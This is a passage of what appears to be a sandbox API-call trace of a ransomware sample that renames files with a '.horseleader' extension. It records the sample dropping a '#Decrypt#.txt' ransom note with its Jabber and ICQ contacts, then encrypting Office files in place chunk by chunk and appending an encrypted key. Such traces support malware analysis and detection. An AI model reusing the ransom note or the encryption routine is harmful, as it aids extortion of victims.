dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WISC30.DLL", cAlternateFileName="")) returned 0 [0245.298] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0245.299] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\#Decrypt#.txt") returned 73 [0245.299] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0245.312] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0245.312] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0245.313] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0245.313] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0245.313] CloseHandle (hObject=0x21c) returned 1 [0245.313] GetProcessHeap () returned 0x780000 [0245.313] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0245.313] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0245.313] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="Windows") returned -1 [0245.313] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform") returned 83 [0245.313] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2=".") returned 1 [0245.313] lstrcmpW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="..") returned 1 [0245.313] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0245.313] GetProcessHeap () returned 0x780000 [0245.314] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0245.314] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*") returned 85 [0245.314] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0245.315] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0245.315] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\.") returned 85 [0245.315] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0245.315] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c23c830, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0245.315] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0245.315] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\..") returned 86 [0245.315] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0245.315] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0245.315] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x24500, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSPPC.DLL", cAlternateFileName="")) returned 1 [0245.315] lstrcmpiW (lpString1="OSPPC.DLL", lpString2="Windows") returned -1 [0245.315] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL") returned 93 [0245.315] StrStrIW (lpFirst="OSPPC.DLL", lpSrch=".horseleader") returned 0x0 [0245.315] lstrcmpW (lpString1="OSPPC.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.315] lstrcmpW (lpString1="OSPPC.DLL", lpString2="_uninstalling_.png") returned 1 [0245.315] lstrlenW (lpString=".testttjffg") returned 11 [0245.315] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL", lpSrch=".testttjffg") returned 0x0 [0245.315] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.315] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.316] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.316] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL") returned 93 [0245.316] StrStrW (lpFirst="OSPPC.DLL", lpSrch=".txt") returned 0x0 [0245.316] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=148736) returned 1 [0245.316] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.316] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.318] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.319] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.319] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfa80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.319] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.324] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.324] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.324] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1f500, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.324] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.326] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.326] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.326] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.326] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.326] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.326] CloseHandle (hObject=0x158) returned 1 [0245.327] GetProcessHeap () returned 0x780000 [0245.327] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.327] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL.horseleader") returned 105 [0245.327] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll.horseleader")) returned 1 [0245.328] GetProcessHeap () returned 0x780000 [0245.328] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.328] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x59922e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x1be700, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="OSPPCEXT.DLL", cAlternateFileName="")) returned 1 [0245.328] lstrcmpiW (lpString1="OSPPCEXT.DLL", lpString2="Windows") returned -1 [0245.328] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL") returned 96 [0245.328] StrStrIW (lpFirst="OSPPCEXT.DLL", lpSrch=".horseleader") returned 0x0 [0245.329] lstrcmpW (lpString1="OSPPCEXT.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.329] lstrcmpW (lpString1="OSPPCEXT.DLL", lpString2="_uninstalling_.png") returned 1 [0245.329] lstrlenW (lpString=".testttjffg") returned 11 [0245.329] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL", lpSrch=".testttjffg") returned 0x0 [0245.329] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.329] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.329] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppcext.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.330] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL") returned 96 [0245.331] StrStrW (lpFirst="OSPPCEXT.DLL", lpSrch=".txt") returned 0x0 [0245.331] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1828608) returned 1 [0245.331] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.331] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.333] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.333] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.334] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xdcb80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.334] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.336] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.337] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.337] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1b9700, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.337] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.339] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.339] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.340] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.340] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.340] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.340] CloseHandle (hObject=0x158) returned 1 [0245.340] GetProcessHeap () returned 0x780000 [0245.340] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.340] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL.horseleader") returned 108 [0245.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppcext.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPCEXT.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppcext.dll.horseleader")) returned 1 [0245.341] GetProcessHeap () returned 0x780000 [0245.341] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.341] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x6c23c830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x2d7e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="osppobjs-spp-plugin-manifest-signed.xrm-ms", cAlternateFileName="OSPPOB~1.XRM")) returned 1 [0245.342] lstrcmpiW (lpString1="osppobjs-spp-plugin-manifest-signed.xrm-ms", lpString2="Windows") returned -1 [0245.342] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms") returned 126 [0245.342] StrStrIW (lpFirst="osppobjs-spp-plugin-manifest-signed.xrm-ms", lpSrch=".horseleader") returned 0x0 [0245.342] lstrcmpW (lpString1="osppobjs-spp-plugin-manifest-signed.xrm-ms", lpString2="#Decrypt#.txt") returned 1 [0245.342] lstrcmpW (lpString1="osppobjs-spp-plugin-manifest-signed.xrm-ms", lpString2="_uninstalling_.png") returned 1 [0245.342] lstrlenW (lpString=".testttjffg") returned 11 [0245.342] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms", lpSrch=".testttjffg") returned 0x0 [0245.342] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.342] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.342] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.343] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppobjs-spp-plugin-manifest-signed.xrm-ms") returned 126 [0245.343] StrStrW (lpFirst="osppobjs-spp-plugin-manifest-signed.xrm-ms", lpSrch=".txt") returned 0x0 [0245.343] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=11646) returned 1 [0245.343] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2d7e, lpOverlapped=0x0) returned 1 [0245.346] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd282, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.346] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2d7e, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2d7e, lpOverlapped=0x0) returned 1 [0245.346] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.347] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.347] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.347] CloseHandle (hObject=0x158) returned 1 [0245.347] GetProcessHeap () returned 0x780000 [0245.347] RtlAllocateHeap 